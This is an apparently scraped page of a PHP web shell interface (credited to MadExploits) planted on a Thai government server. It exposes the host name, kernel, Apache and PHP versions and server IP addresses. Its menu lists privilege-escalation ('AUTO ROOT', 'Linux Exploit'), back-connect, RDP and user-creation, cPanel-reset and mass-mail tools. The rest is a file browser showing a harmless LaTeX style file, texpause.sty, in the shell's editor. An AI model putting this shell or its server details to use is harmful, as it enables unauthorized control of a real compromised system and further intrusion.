Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
tex /
latex /
ppower4 /
[ HOME SHELL ]
Name
Size
Permission
Action
background.sty
3.41
KB
-rw-r--r--
mpmulti.sty
4.75
KB
-rw-r--r--
pause.sty
6.29
KB
-rw-r--r--
pp4link.sty
993
B
-rw-r--r--
pp4slide.sty
1.77
KB
-rw-r--r--
texpause.sty
1.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : texpause.sty
%% texpause.sty Version 1.2 10 Feb 2000 %%--------------------------------------------------------------- %% This is a quick hack to enable repeated pages with incremental %% contents e.g. for displaying slides uncovering step by step. %% %% The initial version (numbered 1.0) was written 07 May 99. %% Version 1.1 was created 25 May 99 and fixed a naming problem. %% Version 1.2 removed test for \pdfoutput on 10 Feb 2000 %% %% Possible extensions: make the page numbering optional (maybe using %% subnumbering) %% Make action optional (for printed versions via pdf). %% %% Plan of attack (should work with TeX and LaTeX): %% - Get some ressources, i.e. one counter, one token register and one %% box. %% - When activated save the current page count in the counter and the %% output routine in the token register. %% - Setup a new output routine, which saves away a copy of the %% current page. %% - Trigger this output routine to save the cumulated page contents. %% - Restore the former output routine and run it with the restored %% saved contents. %% - Reset the page count and reinsert the contents once again, %% removing the last glue item on the page. %% \newbox\p@uses@vebox \newtoks\p@uses@veoutput \newcount\p@uses@vepage \def\pause{\global\p@uses@vepage=\count0\relax %save pagenumber \p@uses@veoutput=\output % make backup copy of output routine \output={\global\setbox\p@uses@vebox=\box255}% copy current contents % only, when triggered \vfill\eject %trigger now \output=\p@uses@veoutput % restore output routine \unvcopy\p@uses@vebox % insert contents \eject % now really show the output \global\count0=\p@uses@vepage\relax %restore page number \unvbox\p@uses@vebox\vskip-\lastskip % and insert again for next turn }%
Close